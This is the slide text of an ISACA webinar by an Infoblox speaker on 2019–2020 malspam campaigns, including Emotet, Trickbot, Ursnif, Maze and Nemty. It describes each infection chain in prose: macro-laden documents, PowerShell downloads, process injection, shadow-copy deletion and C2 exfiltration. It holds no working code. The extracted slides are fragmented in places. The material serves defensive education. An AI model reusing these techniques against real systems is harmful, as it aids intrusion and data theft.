Professional Documents
Culture Documents
MALWARE THREATS:
THE CURRENT SCOPE OF THESE THREATS
AND TOOLS TO SHUT THEM DOWN
MICHAEL ZUCKERMAN, PRODUCT MANAGEMENT, INFOBLOX
WEBINAR INFORMATION & QUICK TIPS
• Use the HELP icon at the bottom for FAQ’s and system requirements.
• You must view the live or recorded webinar for the required amount of time (50
minutes). We encourage you to stay on and watch the entire webinar.
• Check the CPE Credit and Certificate window to view the timer.
• Your CPE Certificate will automatically appear in the ISACA CPE RECORDS tab
on the MyISACA page in your account after completing the required viewing time.
• Please be patient. This process could take up to 24 hours for your CPE Certificate
to appear in your account and another 24 hours for your CPE Credit to be applied
to your CPE Manager.
TODAY’S SPEAKER
Michael Zuckerman
Product Management
Infoblox
AGENDA
The Good
• The number of ransomware incidents in
2018 decreased substantially
The Bad
• Enterprise focused ransomware attacks are
up 12% in 2019.
• The pace continues to grow as
ransomware attacks in healthcare grew
350% in Q4 2019.
The Ugly
• These targeted ransomware attacks are the
most dangerous and most sophisticated.
TARGETED RANSOMWARE GOES AFTER THE ENTERPRISE
In 2019, targeted ransomware attacks hit at multiple cities in the United States and
selected international targets
• SWIFT-Themed Campaigns
• Maze Ransomware
Overview
• From 24 March through 2 April, Infoblox
observed several malicious spam (malspam)
campaigns delivering Formbook malware.
• The campaigns are connected by a
Coronavirus or COVID-19-related theme in their
subject lines or file attachment names.
Attack Chain
ATTACK CHAIN
file, the malware performs process
hollowing and injects itself into the
Microsoft File Explorer process.
Overview
• From 21 to 24 March, Infoblox observed
another malicious spam (malspam) email
campaign that used a fraudulent Coronavirus
alert from the World Health Organization
(WHO) to deliver Trickbot banking malware.
Attack Chain
• When the recipient opens the malicious Word
document and enables macros, the macros
ATTACK CHAIN
within the document create a new directory,
C:\netstats, and generate two files within it.
ATTACK CHAIN
and decompressed the archive file, the
executable inside launched the malware,
gathered victim information, and then
reached out to send the data to an FTP or
SMTP server.
ATTACK CHAIN
two additional executables.
Overview
• During the first week of March, LokiBot
infostealer joined the list of malware being
distributed by threat actor(s) taking advantage
of the fear and interest in the spread of
Coronavirus (COVID-19).
Attack Chain
ATTACK CHAIN
reaches out to a Google Drive and
downloads a file matching the naming
pattern from February’s campaign.
Overview
• Nemty ransomware made its first attempt to
target English-speaking victims with a malspam
campaign
• Nemty only recently started using malspam as a
distribution method,
• Nemty malspam campaigns have been restricted
to targets in the Asia-Pacific region (APAC).
Attack Chain
• When the victim extracts and executes the
malicious JavaScript file contained within
ATTACK CHAIN
the ZIP file attachment, it
• launches a PowerShell command that
retrieves and executes the Nemty
ransomware payload from a remote
server.
• Nemty uses the Windows vssadmin
command to delete any existing shadow
copies of files to prevent the victim from
easily restoring them
• Nemty uses the taskkill command to stop
processes and services that may prevent
it from successfully encrypting files.
SWIFT-THEMED CAMPAIGNS
Overview
• Malspam leverages themes referencing SWIFT
payments network.
• The malspam campaigns were delivering several
malware families, including Agent Tesla
keylogger, Lokibot infostealer, and more.
• The TTP’s appear similar to activity conducted by
the threat actor SWEED as reported by Talos in
2019.
Customer Impact Campaign Analysis
• Agent Tesla can capture and store keystrokes, • All the emails we discovered used the
steal credentials, and exfiltrate data to a acronym “SWIFT” either in the subject line
command and control (C2) server, potentially or the attachment’s file name.
via email messages to a remote mail server.
SWIFT-THEMED CAMPAIGNS
Attack Chain
ATTACK CHAIN
across the campaigns, but all required
the recipient to open an attached file
that was often compressed.
Overview
• Between 23 and 24 January, security researcher
Brad Duncan reported two separate malicious
spam campaigns that used compressed
Microsoft Word documents with malicious macros
to deliver Ursnif malware.
Customer Impact
• Ursnif is a variant of the Gozi banking trojan
Campaign Analysis
that can steal credentials, cryptocurrency • The Ursnif campaign sent messages that
wallets, and email information. Upon infection, appeared to be replies to existing email
Ursnif injects its code into the Internet Explorer chains and asked the recipient(s) to open
(IE) browser, then uses IE to manage an attached ZIP file with a specific
communications with its command and control password.
(C2), including follow-on downloads.
URSNIF BANKING TROJAN
Attack Chain
HOW EMOTET STOLE CHRISTMAS
Overview
• Leading up to 25 December, Infoblox observed
an email campaign themed around both
Christmas and Swedish environmental activist
Greta Thunberg to lure recipients into opening
Microsoft Word documents with malicious macros
that infected victims with the Emotet information
stealer.
Attack Chain
When the recipient opens the malicious Word
document and enables macros, the macros
ATTACK CHAIN
decode and execute a Powershell command
that downloads the Emotet payload from a
compromised website, and then executes it:
• Upon execution, Emotet attempts to
spread laterally across the victim’s
network to infect additional devices while
stealing sensitive information from all
infected devices.
• Throughout the infection process Emotet
contacts its C2 servers to transmit stolen
credentials, receive new instructions, and
retrieve additional malware payloads.
DRIDEX BANKING TROJAN
Overview
• In December we observed a malicious email
campaign distributing Dridex banking trojan. Like
our first Dridex report in June, the emails had
password-protected Microsoft Office document
attachments that used macros with hardcoded
URLs to download and execute Dridex payloads.
Attack Chain
ATTACK CHAIN
prompted to enter a 3 to 4-digit
password found in the body of the email.
Overview
• On 7 November, we observed two email
campaigns distributing the banking trojan
Dreambot, which is a variant of Ursnif.
• Threat actors have distributed Dreambot since
2016, targeting financial customers in Australia,
Italy, Switzerland, the U.K., the U.S., Poland, and
Canada
Attack Chain
• When the email recipient opens the DOCX
attachment, Microsoft Office downloads
ATTACK CHAIN
the externally linked template.
• Office then applies the template and opens
the DOCX file.
• This triggers the VBA code in the template.
• The VBA code runs PowerShell
commands to download and execute
Dreambot using Regsvr32.exe.
• The malware injects itself into Explorer.exe
and runs CMD.exe commands to profile
the user’s computer.
• Dreambot then sends this information to its
command and control (C2) server.
RIG EXPLOIT KIT DROPS INFOSTEALER & CRYSIS RANSOMWARE
Overview
• On 17 November, Broad Analysis
reported a campaign that used Rig
exploit kit to distribute an infostealer
known as Predator The Thief, followed
by a variant of CrySIS ransomware.
Attack Chain
MAZE RANSOMWARE
Overview
• On 29 October, we detected a campaign distributing
Maze ransomware (a variant of ChaCha ransomware)
to Italian-speaking users.
• The emails appeared to be from the Italian Revenue
Agency and instructed users to open an attached
Microsoft Word document with “financial guidelines.”
Attack Chain
Each Word document was embedded with a
macro that downloaded Maze ransomware
ATTACK CHAIN
from the actor-controlled server.
• The macro then wrote the ransomware
payload to
C:\Windows\Temp\wordupd.tmp and
executed it.
• After Maze encrypted the victim’s files, it
made HTTP POST requests to several IP-
based URLs that began with the first octet
91. Only a few of these requests returned
a 200-response code, indicating a
successful connection.
PsiXBot INFOSTEALER USES DNS OVER HTTPS
Overview
• On 11 December, Malware Traffic Analysis reported
on a campaign in which a threat actor was delivering
PsiXBot via the Spelevo exploit kit (EK).
• PsiXBot steals information, adds computers to its
botnet and uses DNS over HTTPS (DoH).
Attack Chain
VULNERABILITIES & MITIGATION
Let's Not Forget the RDP Attack Vector - in our Last Report
Infoblox delivers the next-level network experience with its Secure Cloud-
Managed Network Services.
As a pioneer in providing the world’s most reliable, secure, and automated
networks, we are relentless in our pursuit of next-level network simplicity.
A recognized industry leader, Infoblox has 50 percent market share comprised of
8,000 customers, including 350 of the Fortune 500.
You assume the entire risk for the use of the content and acknowledge that: ISACA
has designed the content primarily as an educational resource for IT professionals and
therefore the content should not be deemed either to set forth all appropriate
procedures, tests, or controls or to suggest that other procedures, tests, or controls
that are not included may not be appropriate; ISACA does not claim that use of the
content will assure a successful outcome and you are responsible for applying
professional judgement to the specific circumstances presented to determining the
appropriate procedures, tests, or controls.
Copyright © 2020 by the Information Systems Audit and Control Association, Inc. (ISACA). All rights reserved. This webinar may not be used, copied, reproduced,
modified, distributed, displayed, stored in a retrieval system, or transmitted in any form by any means (electronic, mechanical, photocopying, recording or otherwise).
THANK YOU FOR
ATTENDING THIS
ISACA WEBINAR